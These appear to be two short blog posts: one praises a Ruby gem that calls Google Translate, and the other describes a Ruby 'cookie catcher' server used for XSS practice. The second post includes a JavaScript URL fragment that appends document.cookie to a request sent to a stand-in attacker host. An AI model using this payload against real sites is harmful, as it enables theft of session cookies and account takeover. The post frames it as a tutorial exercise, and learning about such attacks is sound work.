Let Google do the dirty work.

Thanks to the Changelog, today I was introduced to easy_translate. This gem of a ruby gem uses Google translate to, well... translate. Awesome. We need to use Google to do more of our dirty work.

I am not one of the greatest spellers to ever have lived. As I was using a word processor the other day, I observed that when I don't know how to spell a word, I google it instead of using the built in spell checker. Google is far superior to any spellchecker. So if you're writing a word processor, save yourself some work and write a tool that uses google for spell checking.

Simple Ruby Cookie Catcher

So I've been playing around with some XSS the last couple days on Google Code Univerity's web security tutorial and it's pretty awesome. However, injecting <script>alert("xss!")</script> isn't quite as fun as actually stealing data.

So I did a quick google search for simple cookie catching scripts, only they were pretty much all in PHP. So I decided to whip up something quick in ruby. And so, without further ado...



There you go. The XSS script needs to make the browser issue an HTTP GET request to the ruby server; the url can look like anything, just include a '?' followed by a query string containing the desired data (like a cookie). The url I build looks like:

"http://blahblah.com:8080/hai?"+document.cookie

You can pass as much data in the query string as you'd like, and all the results are written out to cookiejar.txt.